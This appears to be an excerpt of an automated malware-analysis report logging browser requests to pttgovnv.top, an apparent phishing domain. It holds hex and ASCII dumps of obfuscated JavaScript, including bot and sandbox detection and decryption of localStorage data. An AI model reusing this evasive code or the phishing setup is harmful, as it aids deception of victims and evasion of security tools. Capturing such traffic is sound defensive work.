    2024-09-01 22:28:24 UTC1354INData Raw: 2f 30 78 36 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 31 38 39 64 28 30 78 63 33 29 29 2f 30 78 37 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 31 38 39 64 28 30 78 63 63 29 29 2f 30 78 38 3b 69 66 28 5f 30 78 32 39 62 39 39 36 3d 3d 3d 5f 30 78 33 64 39 63 61 30 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 33 61 36 39 32 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 61 36 39 32 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 35 37 31 65 33 62 29 7b 5f 30 78 33 61 36 39 32 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 61 36 39 32 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 30 5f 30 78 31 37 32 36 2c 30 78 36 31 31 31 39 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 31 30 35 35 28 5f 30 78 66 36 34 34 37 30 2c 5f
    Data Ascii: /0x6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_0x1055(_0xf64470,_
    2024-09-01 22:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    21192.168.2.449761104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:24 UTC532OUTGET /help/assets/c27b6911JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC755INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"764-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 37245
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8SCCHn9QdBHx3qW0FHdYw4OtdzfRYFxBQgPgdAEd9%2BiUX1TpP6CXeEbojPVpAvO3MtnpOoWGyPfdcpKO35MV6jf0j72RzhMB7BfmiFQOXqm2JQfkfbSazV%2F5Xw3nEY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b177690d43b7-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC614INData Raw: 37 36 34 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 36 38 32 35 3d 61 32 34 5f 30 78 33 32 34 62 28 29 3b 72 65 74 75 72 6e 20 61 32 34 5f 30 78 35 33 34 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 30 64 65 37 2c 5f 30 78 63 65 30 63 62 32 29 7b 5f 30 78 33 62 30 64 65 37 3d 5f 30 78 33 62 30 64 65 37 2d 30 78 36 37 3b 6c 65 74 20 5f 30 78 33 32 34 62 64 62 3d 5f 30 78 35 35 36 38 32 35 5b 5f 30 78 33 62 30 64 65 37 5d 3b 72 65 74 75 72 6e 20 5f 30 78 33 32 34 62 64 62 3b 7d 2c 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 33 32 34 62 28
    Data Ascii: 764function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(
    2024-09-01 22:28:24 UTC1285INData Raw: 30 78 32 39 30 37 66 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 62 32 63 39 63 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 62 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 32 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 36 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 64 29 29 2f 30 78 34 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 34 29 29 2f 30 78 35 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 39 29 29 2f 30 78 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 66 29
    Data Ascii: 0x2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f)
    2024-09-01 22:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    22192.168.2.449766104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:24 UTC364OUTGET /help/assets/ec21517bJxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC755INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"a97-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 184
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x60RrNApJYTm43aBvTTNvCCARNjA3O0TPevhBbP9RfZvJ6CmUZf1v2E6Lu0tqbLJB8KFI2mKUmNlZhfSpFB%2FPwn%2By5RcdBw1Wsl7JWY6fb%2BzgLaoix0ZZH4yVFmSb3c%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1776e2e726f-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC614INData Raw: 61 39 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 64 38 37 64 62 2c 5f 30 78 34 62 35 65 34 37 29 7b 63 6f 6e 73 74 20 5f 30 78 66 65 62 32 31 65 3d 61 33 31 5f 30 78 33 35 35 65 2c 5f 30 78 34 31 64 34 65 34 3d 5f 30 78 33 64 38 37 64 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 66 34 63 35 34 33 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 36 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 63 29 29 2f 30 78 34 2b 2d 70 61 72 73 65 49 6e 74 28 5f
    Data Ascii: a97(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_
    2024-09-01 22:28:24 UTC1369INData Raw: 78 33 36 64 65 2c 30 78 62 66 39 37 31 29 29 3b 63 6f 6e 73 74 20 61 33 31 5f 30 78 32 38 65 37 66 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 63 38 32 31 34 35 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 62 37 37 38 2c 5f 30 78 32 30 64 65 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 33 62 38 39 3d 5f 30 78 63 38 32 31 34 35 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 63 32 64 35 3d 61 33 31 5f 30 78 33 35 35 65 3b 69 66 28 5f 30 78 32 30 64 65 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 35 62 33 30 34 3d 5f 30 78 32 30 64 65 63 33 5b 5f 30 78 33 61 63 32 64 35 28 30 78 31 32 61 29 5d 28 5f 30 78 33 65 62 37 37 38 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30
    Data Ascii: x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0
    2024-09-01 22:28:24 UTC735INData Raw: 2c 5f 30 78 35 32 31 31 65 32 3d 61 33 31 5f 30 78 33 34 66 35 31 33 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 39 29 5d 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 30 29 5d 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 37 29 5d 28 5f 30 78 31 64 62 64 31 34 29 7c 7c 27 27 2c 5f 30 78 61 34 65 37 35 65 29 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 38 29 5d 28 61 33 31 5f 30 78 33 34 66 35 31 33 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 34 29 5d 5b 27 55 74 66 38 27 5d 29 2c 5f 30 78 35 35 65 61 32 65 3d 4a 53 4f 4e 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 66 29 5d 28 5f 30 78 35 32 31 31 65 32 7c 7c 27 7b 7d 27 29 3b 69 66 28 5f 30 78 34 65 62 61 33 33 29 7b 5f 30 78 35 35 65 61 32 65 5b 5f 30 78 63 65 34
    Data Ascii: ,_0x5211e2=a31_0x34f513[_0x49d95c(0x129)][_0x49d95c(0x130)](localStorage[_0x49d95c(0x127)](_0x1dbd14)||'',_0xa4e75e)[_0x49d95c(0x128)](a31_0x34f513[_0x49d95c(0x134)]['Utf8']),_0x55ea2e=JSON[_0x49d95c(0x13f)](_0x5211e2||'{}');if(_0x4eba33){_0x55ea2e[_0xce4
    2024-09-01 22:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    23192.168.2.449763104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:24 UTC364OUTGET /help/assets/c16a2af0JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC752INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:44 GMT
    ETag: W/"8a73-18fc3d84e20"
    CF-Cache-Status: HIT
    Age: 184
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qp6lUpwFwRgKF5C0USMrjoPkkcl4ojUC3YW%2FEJvpNMO8M6i6BHx7cyy0e8LCGCku98kfAltsICT1vtm5vFG1b2S5C6dN7K0SzhiyWp8hhLNOyTUcEB7abdoSXG49QPI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1776fc44376-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC617INData Raw: 37 63 63 30 0d 0a 76 61 72 20 61 32 33 5f 30 78 32 32 30 38 61 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 31 61 32 32 2c 5f 30 78 32 39 64 61 64 62 29 7b 76 61 72 20 5f 30 78 31 33 65 38 38 35 3d 61 32 33 5f 30 78 31 62 39 34 2c 5f 30 78 31 33 62 65 61 38 3d 5f 30 78 31 37 31 61 32 32 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 34 63 63 35 36 38 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 32 63 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 65 38 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 66 62 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38
    Data Ascii: 7cc0var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e8
    2024-09-01 22:28:24 UTC1369INData Raw: 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 32 33 5f 30 78 31 61 35 38 2c 30 78 38 39 63 36 38 29 29 3b 69 6d 70 6f 72 74 7b 6c 20 61 73 20 61 32 33 5f 30 78 34 39 32 65 30 35 2c 5f 20 61 73 20 61 32 33 5f 30 78 31 38 35 62 65 65 7d 66 72 6f 6d 27 2e 2f 69 6e 64 65 78 2d 66 35 34 35 37 37 31 38 2e 6a 73 27 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 61 32 33 5f 30 78 35 65 37 34 62 31 7d 66 72 6f 6d 27 2e 2f 30 39 62 66 30 31 66 38 4a 78 4b 6e 57 2e 6a 73 27 3b 69 6d 70 6f 72 74 7b 6d 20 61 73 20 61 32 33 5f 30 78 35 65 38 39 62 39 7d 66 72 6f 6d 27 2e 2f 65 63 32 31 35 31 37 62 4a 78 4b 6e 57 2e 6a 73 27 3b 76 61 72 20 45 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 65 39 39 38 2c 5f 30 78 32 66 36 37 65 62 29 7b 76 61 72 20 5f 30 78 35 35 39 30
    Data Ascii: 8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var _0x5590
    2024-09-01 22:28:24 UTC1369INData Raw: 78 35 39 64 38 36 65 29 3b 7d 29 3b 7d 72 65 74 75 72 6e 20 6e 65 77 28 5f 30 78 34 31 32 63 34 30 7c 7c 28 5f 30 78 34 31 32 63 34 30 3d 50 72 6f 6d 69 73 65 29 29 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 38 35 63 64 36 2c 5f 30 78 31 31 62 35 39 61 29 7b 76 61 72 20 5f 30 78 31 63 61 62 62 34 3d 61 32 33 5f 30 78 31 62 39 34 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 31 63 61 62 28 5f 30 78 36 64 38 66 64 38 29 7b 76 61 72 20 5f 30 78 31 39 38 61 66 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 74 72 79 7b 5f 30 78 34 33 65 62 34 38 28 5f 30 78 33 38 38 30 65 37 5b 5f 30 78 31 39 38 61 66 35 28 30 78 32 64 64 29 5d 28 5f 30 78 36 64 38 66 64 38 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 39 64 39 64 33 29 7b 5f 30 78 31 31 62 35 39 61 28 5f 30 78 31 39 64 39
    Data Ascii: x59d86e);});}return new(_0x412c40||(_0x412c40=Promise))(function(_0x385cd6,_0x11b59a){var _0x1cabb4=a23_0x1b94;function _0x3e1cab(_0x6d8fd8){var _0x198af5=a23_0x1b94;try{_0x43eb48(_0x3880e7[_0x198af5(0x2dd)](_0x6d8fd8));}catch(_0x19d9d3){_0x11b59a(_0x19d9
    2024-09-01 22:28:24 UTC1369INData Raw: 34 34 62 32 36 64 3d 30 78 30 2c 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 26 26 28 5f 30 78 32 61 64 36 33 37 3d 30 78 30 29 29 2c 5f 30 78 32 61 64 36 33 37 3b 29 74 72 79 7b 69 66 28 5f 30 78 34 33 37 37 33 61 3d 30 78 31 2c 5f 30 78 32 64 39 37 66 64 26 26 28 5f 30 78 35 35 35 34 65 31 3d 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 26 30 78 32 3f 5f 30 78 32 64 39 37 66 64 5b 27 72 65 74 75 72 6e 27 5d 3a 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 3f 5f 30 78 32 64 39 37 66 64 5b 27 74 68 72 6f 77 27 5d 7c 7c 28 28 5f 30 78 35 35 35 34 65 31 3d 5f 30 78 32 64 39 37 66 64 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 65 31 29 5d 29 26 26 5f 30 78 35 35 35 34 65 31 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 37 38 29 5d 28 5f 30 78 32 64 39 37 66 64 29 2c 30 78
    Data Ascii: 44b26d=0x0,_0x15868d[0x0]&&(_0x2ad637=0x0)),_0x2ad637;)try{if(_0x43773a=0x1,_0x2d97fd&&(_0x5554e1=_0x15868d[0x0]&0x2?_0x2d97fd['return']:_0x15868d[0x0]?_0x2d97fd['throw']||((_0x5554e1=_0x2d97fd[_0x396e75(0x2e1)])&&_0x5554e1[_0x396e75(0x278)](_0x2d97fd),0x
    2024-09-01 22:28:24 UTC1369INData Raw: 28 30 78 32 30 34 29 5d 3d 5f 30 78 35 35 35 34 65 31 5b 30 78 32 5d 2c 5f 30 78 32 61 64 36 33 37 5b 27 6f 70 73 27 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 61 32 29 5d 28 5f 30 78 31 35 38 36 38 64 29 3b 62 72 65 61 6b 3b 7d 5f 30 78 35 35 35 34 65 31 5b 30 78 32 5d 26 26 5f 30 78 32 61 64 36 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 31 65 63 29 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 35 34 29 5d 28 29 2c 5f 30 78 32 61 64 36 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 31 66 33 29 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 35 34 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 7d 5f 30 78 31 35 38 36 38 64 3d 5f 30 78 32 62 31 31 63 30 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 37 38 29 5d 28 5f 30 78 33 64 39 32 35 62 2c 5f 30 78 32 61 64 36 33
    Data Ascii: (0x204)]=_0x5554e1[0x2],_0x2ad637['ops'][_0x396e75(0x2a2)](_0x15868d);break;}_0x5554e1[0x2]&&_0x2ad637[_0x396e75(0x1ec)][_0x396e75(0x254)](),_0x2ad637[_0x396e75(0x1f3)][_0x396e75(0x254)]();continue;}_0x15868d=_0x2b11c0[_0x396e75(0x278)](_0x3d925b,_0x2ad63
    2024-09-01 22:28:24 UTC1369INData Raw: 78 31 62 61 29 2c 27 53 65 71 75 65 6e 74 75 6d 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 32 32 35 29 2c 27 53 6c 69 6d 65 72 4a 53 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 31 64 37 29 2c 27 57 65 62 44 72 69 76 65 72 49 4f 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 33 30 37 29 2b 27 6f 27 2c 27 57 65 62 44 72 69 76 65 72 27 3a 27 77 65 62 64 72 69 76 65 72 27 2c 27 48 65 61 64 6c 65 73 73 43 68 72 6f 6d 65 27 3a 27 68 65 61 64 6c 65 73 73 5f 63 27 2b 27 68 72 6f 6d 65 27 2c 27 55 6e 6b 6e 6f 77 6e 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 32 39 36 29 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 63 34 37 65 29 7b 76 61 72 20 5f 30 78 35 35 63 30 35 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78
    Data Ascii: x1ba),'Sequentum':a23_0x2208a5(0x225),'SlimerJS':a23_0x2208a5(0x1d7),'WebDriverIO':a23_0x2208a5(0x307)+'o','WebDriver':'webdriver','HeadlessChrome':'headless_c'+'hrome','Unknown':a23_0x2208a5(0x296)},c=function(_0x44c47e){var _0x55c059=(function(){var _0x
    2024-09-01 22:28:24 UTC1369INData Raw: 5f 30 78 33 34 63 37 39 32 28 30 78 32 31 39 29 5d 29 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 37 63 29 5d 3b 69 66 28 2f 73 6c 69 6d 65 72 6a 73 2f 69 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 30 39 29 5d 28 5f 30 78 61 63 64 39 36 37 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 31 39 29 5d 29 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 33 34 63 37 39 32 28 30 78 33 30 30 29 5d 3b 7d 66 75 6e 63 74 69 6f 6e 20 70 28 5f 30 78 66 32 62 35 65 38 2c 5f 30 78 34 62 63 61 31 61 29 7b 76 61 72 20 5f 30 78 34 37 61 31 61 61 3d 61 32 33 5f 30 78 32 32 30 38 61 35 3b 72 65 74 75 72 6e 20 5f 30 78 66 32 62 35 65 38 5b 5f 30 78 34 37 61 31 61 61 28 30 78 32 62 36 29 5d 28 5f 30 78 34 62 63 61 31 61 29 21 3d 3d 2d 30 78 31 3b 7d 66 75 6e 63 74 69
    Data Ascii: _0x34c792(0x219)]))return u[_0x34c792(0x27c)];if(/slimerjs/i[_0x34c792(0x209)](_0xacd967[_0x34c792(0x219)]))return u[_0x34c792(0x300)];}function p(_0xf2b5e8,_0x4bca1a){var _0x47a1aa=a23_0x2208a5;return _0xf2b5e8[_0x47a1aa(0x2b6)](_0x4bca1a)!==-0x1;}functi
    2024-09-01 22:28:24 UTC1369INData Raw: 5f 30 78 33 37 66 33 32 36 3d 5f 30 78 36 30 33 32 61 61 28 5f 30 78 34 34 32 37 33 61 29 3b 69 66 28 74 79 70 65 6f 66 20 5f 30 78 33 37 66 33 32 36 3d 3d 27 6f 62 6a 65 63 74 27 29 72 65 74 75 72 6e 20 5f 30 78 33 37 66 33 32 36 5b 5f 30 78 32 33 32 38 38 36 28 30 78 32 31 39 29 5d 3b 7d 72 65 74 75 72 6e 21 30 78 31 3b 7d 66 75 6e 63 74 69 6f 6e 20 67 28 5f 30 78 31 64 66 31 37 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 64 66 31 37 64 5b 27 72 65 64 75 63 65 27 5d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 33 33 32 66 37 2c 5f 30 78 34 36 37 66 66 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 33 33 32 66 37 2b 28 5f 30 78 34 36 37 66 66 36 3f 30 78 31 3a 30 78 30 29 3b 7d 2c 30 78 30 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 33 5f 30 78 31 61 35 38 28 29 7b
    Data Ascii: _0x37f326=_0x6032aa(_0x44273a);if(typeof _0x37f326=='object')return _0x37f326[_0x232886(0x219)];}return!0x1;}function g(_0x1df17d){return _0x1df17d['reduce'](function(_0x2332f7,_0x467ff6){return _0x2332f7+(_0x467ff6?0x1:0x0);},0x0);}function a23_0x1a58(){
    2024-09-01 22:28:24 UTC1369INData Raw: 27 65 78 74 65 72 6e 61 6c 27 2c 27 63 61 6c 6c 50 68 61 6e 74 6f 27 2c 27 74 6f 4c 6f 77 65 72 43 61 73 27 2c 27 38 64 4f 79 6f 4a 43 27 2c 27 74 65 4e 61 6d 65 73 27 2c 27 34 71 54 73 59 61 77 27 2c 27 65 6c 65 63 74 72 6f 6e 27 2c 27 63 6f 6c 6c 65 63 74 27 2c 27 72 65 65 6e 58 27 2c 27 65 72 72 6f 72 54 72 61 63 65 27 2c 27 57 65 62 4b 69 74 4d 65 64 69 27 2c 27 4d 65 64 69 61 53 65 74 74 69 27 2c 27 53 65 6c 65 6e 69 75 6d 27 2c 27 6e 67 73 52 61 6e 67 65 27 2c 27 77 65 62 47 4c 27 2c 27 38 30 31 30 38 33 37 72 58 65 58 76 4b 27 2c 27 6d 73 69 65 27 2c 27 6c 76 65 4c 6f 63 61 6c 46 69 27 2c 27 6e 66 6f 27 2c 27 72 5f 65 76 61 6c 75 61 74 65 27 2c 27 67 69 6e 41 72 72 61 79 5c 78 32 30 69 27 2c 27 4a 78 4b 6e 57 2e 6a 73 27 2c 27 65 50 72 6f 70 73 27
    Data Ascii: 'external','callPhanto','toLowerCas','8dOyoJC','teNames','4qTsYaw','electron','collect','reenX','errorTrace','WebKitMedi','MediaSetti','Selenium','ngsRange','webGL','8010837rXeXvK','msie','lveLocalFi','nfo','r_evaluate','ginArray\x20i','JxKnW.js','eProps'
    2024-09-01 22:28:24 UTC1369INData Raw: 27 5f 73 65 6c 65 6e 69 75 6d 27 2c 27 76 65 72 73 69 6f 6e 73 27 2c 27 6f 6e 73 69 73 74 65 6e 74 27 2c 27 63 6f 64 65 27 2c 27 77 69 6e 64 6f 77 45 78 74 65 27 2c 27 68 61 73 4f 77 6e 50 72 6f 70 27 2c 27 6e 65 78 74 27 2c 27 67 65 74 49 74 65 6d 27 2c 27 4e 69 67 68 74 6d 61 72 65 4a 27 2c 27 65 74 73 27 2c 27 72 65 74 75 72 6e 27 2c 27 65 6d 65 6e 74 4b 65 79 73 27 2c 27 72 41 6c 65 72 74 27 2c 27 72 69 6e 67 43 6f 6e 74 65 78 27 2c 27 66 6c 65 63 74 5d 27 2c 27 68 74 74 70 27 2c 27 53 65 71 75 65 6e 74 75 6d 27 2c 27 63 72 65 61 74 65 27 2c 27 5f 75 6e 77 72 61 70 70 65 64 27 2c 27 36 36 34 34 30 67 66 54 55 46 64 27 2c 27 62 6f 74 27 2c 27 41 70 70 6c 65 50 61 79 45 72 27 2c 27 77 65 62 44 72 69 76 65 72 27 2c 27 64 69 73 74 69 6e 63 74 69 76 27 2c
